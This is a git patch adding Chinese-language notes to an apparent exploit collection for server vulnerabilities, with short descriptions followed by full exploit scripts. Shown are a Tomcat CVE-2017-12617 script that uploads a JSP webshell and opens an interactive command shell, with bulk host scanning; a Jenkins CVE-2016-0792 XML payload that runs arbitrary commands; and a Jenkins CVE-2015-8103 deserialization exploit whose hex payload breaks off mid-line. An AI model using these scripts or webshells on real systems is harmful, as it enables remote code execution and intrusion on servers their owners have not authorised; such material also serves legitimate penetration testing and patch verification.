From 5b41e2c1f9a66b111adc828f831866abc017750a Mon Sep 17 00:00:00 2001
From: Threekiii <472361400@qq.com>
Date: Wed, 30 Nov 2022 16:13:38 +0800
Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md |   2 +-
 .../Apache Tomcat RCE via JSP Upload Bypass.md | 261 ++++++++++++++++++
 .../Jenkins XStream 反序列化漏洞 CVE-2016-0792.md | 101 +++++++
 .../Jenkins 远程代码执行漏洞 CVE-2015-8103.md | 122 ++++++++
 .../WebLogic T3 反序列化漏洞 CVE-2016-3510.md |  92 ++++++
 .../Citrix 远程命令执行漏洞 CVE-2019-19781.md | 107 +++++++
 网络设备漏洞/Untitled.md                      |   0
 7 files changed, 684 insertions(+), 1 deletion(-)
 create mode 100644 Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md
 create mode 100644 Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md
 create mode 100644 Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md
 create mode 100644 Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md
 create mode 100644 网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md
 delete mode 100644 网络设备漏洞/Untitled.md

diff --git a/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md b/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md
index ce82c43..7867761 100644
--- a/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md	
+++ b/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md	
@@ -1,6 +1,6 @@
 # Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938
 
-# 漏洞描述
+## 漏洞描述
 
 Java 是目前 Web 开发中最主流的编程语言，而 Tomcat 是当前最流行的 Java 中间件服务器之一，从初版发布到现在已经有二十多年历史，在世界范围内广泛使用。
 
diff --git a/Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md b/Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md
new file mode 100644
index 0000000..5fef7f9
--- /dev/null
+++ b/Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md	
@@ -0,0 +1,261 @@
+# Apache Tomcat RCE via JSP Upload Bypass CVE-2017-12617
+
+## 漏洞描述
+
+Apache Tomcat版本9.0.0.M1至9.0.0、8.5.0至8.5.22、8.0.0.RC1至8.0.46和7.0.0至7.0.81且启用HTTP PUT时（例如，通过设置只读如果将Default servlet的初始化参数设置为false，则可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP，并且服务器将执行其中包含的所有代码。
+
+## 漏洞影响
+
+```
+Apache Tomcat版本9.0.0.M1至9.0.0
+Apache Tomcat版本8.5.0至8.5.22
+Apache Tomcat版本8.0.0.RC1至8.0.46
+Apache Tomcat版本7.0.0至7.0.81
+```
+
+## 漏洞EXP
+
+```python
+#!/usr/bin/python
+# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py
+"""
+./cve-2017-12617.py [options]
+
+
+options:
+
+
+-u ,--url [::] check target url if it's vulnerable
+-p,--pwn [::] generate webshell and upload it
+-l,--list [::] hosts list
+
+
+[+]usage:
+
+
+./cve-2017-12617.py -u http://127.0.0.1
+./cve-2017-12617.py --url http://127.0.0.1
+./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+./cve-2017-12617.py -l hotsts.txt
+./cve-2017-12617.py --list hosts.txt
+"""
+from __future__ import print_function
+from builtins import input
+from builtins import str
+from builtins import object
+import requests
+import re
+import signal
+from optparse import OptionParser
+
+
+
+
+
+
+
+
+class bcolors(object):
+    HEADER = '\033[95m'
+    OKBLUE = '\033[94m'
+    OKGREEN = '\033[92m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+    BOLD = '\033[1m'
+    UNDERLINE = '\033[4m'
+
+
+
+
+banner="""
+
+
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/
+
+
+
+[@intx0x80]
+
+"""
+
+
+
+
+
+def signal_handler(signal, frame):
+
+    print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
+
+    exit()
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+
+
+def removetags(tags):
+    remove = re.compile('<.*?>')
+    txt = re.sub(remove, '\n', tags)
+    return txt.replace("\n\n\n","\n")
+
+
+def getContent(url,f):
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    re=requests.get(str(url)+"/"+str(f), headers=headers)
+    return re.content
+
+def createPayload(url,f):
+    evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
+    if req.status_code==201:
+        print("File Created ..")
+
+
+def RCE(url,f):
+    EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
+    <INPUT name='cmd' type=text>
+    <INPUT type=submit value='Run'>
+    </FORM>
+    <%@ page import="java.io.*" %>
+    <%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec(cmd,null,null);
+         BufferedReader sI = new BufferedReader(new
+InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) { output += s+"</br>"; }
+      }  catch(IOException e) {   e.printStackTrace();   }
+   }
+%>
+<pre><%=output %></pre>"""
+
+
+
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
+
+
+
+def shell(url,f):
+
+    while True:
+        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+        cmd=input("$ ")
+        payload={'cmd':cmd}
+        if cmd=="q" or cmd=="Q":
+            break
+
+        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
+        re=str(re.content)
+        t=removetags(re)
+        print(t)
+
+
+
+
+
+#print bcolors.HEADER+ banner+bcolors.ENDC
+
+parse=OptionParser(
+
+
+bcolors.HEADER+"""
+
+
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/
+
+
+
+
+./cve-2017-12617.py [options]
+
+options:
+
+-u ,--url [::] check target url if it's vulnerable
+-p,--pwn  [::] generate webshell and upload it
+-l,--list [::] hosts list
+
+[+]usage:
+
+./cve-2017-12617.py -u http://127.0.0.1
+./cve-2017-12617.py --url http://127.0.0.1
+./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+./cve-2017-12617.py -l hotsts.txt
+./cve-2017-12617.py --list hosts.txt
+
+
+[@intx0x80]
+
+"""+bcolors.ENDC
+
+    )
+
+
+parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
+parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
+parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
+
+(opt,args)=parse.parse_args()
+
+if opt.U==None and opt.P==None and opt.L==None:
+    print(parse.usage)
+    exit(0)
+
+
+
+else:
+    if opt.U!=None and opt.P==None and opt.L==None:
+        print(bcolors.OKGREEN+banner+bcolors.ENDC)
+        url=str(opt.U)
+        checker="Poc.jsp"
+        print(bcolors.BOLD +"Poc Filename  {}".format(checker))
+        createPayload(str(url)+"/",checker)
+        con=getContent(str(url)+"/",checker)
+        if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+            print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
+            print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
+
+        else:
+            print('Not Vulnerable to CVE-2017-12617 ')
+    elif opt.P!=None and opt.U!=None and  opt.L==None:
+        print(bcolors.OKGREEN+banner+bcolors.ENDC)
+        pwn=str(opt.P)
+        url=str(opt.U)
+        print("Uploading Webshell .....")
+        pwn=pwn+".jsp"
+        RCE(str(url)+"/",pwn)
+        shell(str(url),pwn)
+    elif opt.L!=None and opt.P==None and opt.U==None:
+        print(bcolors.OKGREEN+banner+bcolors.ENDC)
+        w=str(opt.L)
+        f=open(w,"r")
+        print("Scaning hosts in {}".format(w))
+        checker="Poc.jsp"
+        for i in f.readlines():
+            i=i.strip("\n")
+            createPayload(str(i)+"/",checker)
+            con=getContent(str(i)+"/",checker)
+            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+                print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
+```
+
+
+
diff --git a/Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md b/Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md
new file mode 100644
index 0000000..d95f4ff
--- /dev/null
+++ b/Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md	
@@ -0,0 +1,101 @@
+# Jenkins XStream 反序列化漏洞 CVE-2016-0792
+
+## 漏洞描述
+
+国外网站`Contrast Security`于2016年2月24日在公开了Jenkins近日修复的一个可通过低权限用户调用API服务致使的命令执行漏洞详情。通过低权限用户构造一个恶意的XML文档发送至服务端接口，使服务端解析时调用API执行外部命令。
+
+## 漏洞影响
+
+```
+jenkins版本小于1.650（1.650版本已修复该问题）
+```
+
+## 漏洞EXP
+
+```python
+#! /usr/bin/env python2
+
+#Jenkins Groovy XML RCE (CVE-2016-0792)
+#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
+#Made with <3 by @byt3bl33d3r
+
+from __future__ import print_function
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import argparse
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if len(args.target.split(':')) != 2:
+    print('[-] Target must be in format IP:PORT')
+    sys.exit(1)
+
+if not args.command:
+    print('[-] You must specify a command to run')
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+print('[*] Target IP: {}'.format(ip))
+print('[*] Target PORT: {}'.format(port))
+
+xml_formatted = ''
+command_list = args.command.split()
+for cmd in command_list:
+    xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
+
+xml_payload = '''<map>
+  <entry>
+    <groovy.util.Expando>
+      <expandoProperties>
+        <entry>
+          <string>hashCode</string>
+          <org.codehaus.groovy.runtime.MethodClosure>
+            <delegate class="groovy.util.Expando" reference="../../../.."/>
+            <owner class="java.lang.ProcessBuilder">
+              <command>
+                {}
+              </command>
+              <redirectErrorStream>false</redirectErrorStream>
+            </owner>
+            <resolveStrategy>0</resolveStrategy>
+            <directive>0</directive>
+            <parameterTypes/>
+            <maximumNumberOfParameters>0</maximumNumberOfParameters>
+            <method>start</method>
+          </org.codehaus.groovy.runtime.MethodClosure>
+        </entry>
+      </expandoProperties>
+    </groovy.util.Expando>
+   <int>1</int>
+ </entry>
+</map>'''.format(xml_formatted.strip())
+
+print('[*] Generated XML payload:')
+print(xml_payload)
+print() 
+
+print('[*] Sending payload')
+headers = {'Content-Type': 'text/xml'}
+r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
+
+paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
+if r.status_code == 500:
+    for path in paths_in_trace:
+        if path in r.text:
+            print('[+] Command executed successfully')
+            break
+```
+
diff --git a/Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md b/Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md
new file mode 100644
index 0000000..0eeb514
--- /dev/null
+++ b/Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md	
@@ -0,0 +1,122 @@
+## Jenkins远程代码执行漏洞 CVE-2015-8103
+
+## 漏洞描述
+
+1.638之前的Jenkins和1.625.2之前的LTS中的`Jenkins CLI`子系统，允许远程攻击者通过制作的序列化Java对象执行有问题的`commons-collections`。
+
+## 漏洞影响
+
+```
+Jenkins jenkins<= LTS 1.625.1
+Jenkins jenkins<= 1.637
+```
+
+## 漏洞复现
+
+靶场环境: 
+
+- https://github.com/Medicean/VulApps/tree/master/j/jenkins/1
+
+拉取镜像并启动：
+
+```
+$ docker pull medicean/vulapps:j_jenkins_1
+$ docker run -d -p 8080:8080 -p 50000:50000 medicean/vulapps:j_jenkins_1
+```
+
+其中 8080 为 Jenkins web 管理端口，50000 为 Jenkins SLAVE AGENT 端口。
+访问`http://your-ip:8080/`，看到 Jenkins Web 管理界面即代表启动成功。
+
+## 漏洞EXP
+
+```python
+#! /usr/bin/env python2
+
+#Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103)
+#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
+#Made with <3 by @byt3bl33d3r
+
+from __future__ import print_function
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import socket
+import sys
+import base64
+import argparse
+import os
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+    for path in ysoserial_default_paths:
+        if os.path.exists(path):
+            ysoserial_path = path
+else:
+    if os.path.exists(args.ysoserial_path):
+        ysoserial_path = args.ysoserial_path
+
+if ysoserial_path is None:
+    print("[-] Could not find ysoserial JAR file")
+    sys.exit(1)
+
+if len(args.target.split(':')) != 2:
+    print('[-] Target must be in format IP:PORT')
+    sys.exit(1)
+
+if not args.command:
+    print('[-] You must specify a command to run')
+    sys.exit(1)
+
+host, port = args.target.split(':')
+
+print('[*] Target IP: {}'.format(host))
+print('[*] Target PORT: {}'.format(port))
+print('\n')
+
+print('[*] Retrieving the Jenkins CLI port')
+#Query Jenkins over HTTP to find what port the CLI listener is on
+r = requests.get('{}://{}:{}'.format(args.proto, host, port))
+cli_port = int(r.headers['X-Jenkins-CLI-Port'])
+
+#Open a socket to the CLI port
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+server_address = (host, cli_port)
+print('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port))
+sock.connect(server_address)
+
+# Send headers
+headers='\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
+print('[*] Sending headers')
+sock.send(headers)
+
+data = sock.recv(1024)
+print('[*] Received "{}"'.format(data))
+
+if data.find('JENKINS REMOTING CAPACITY') == -1:
+    data = sock.recv(1024)
+    print('[*] Received "{}"'.format(data))
+
+payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command])
+payload_b64 = base64.b64encode(payloadObj)
+payload='\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'+payload_b64+'\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x0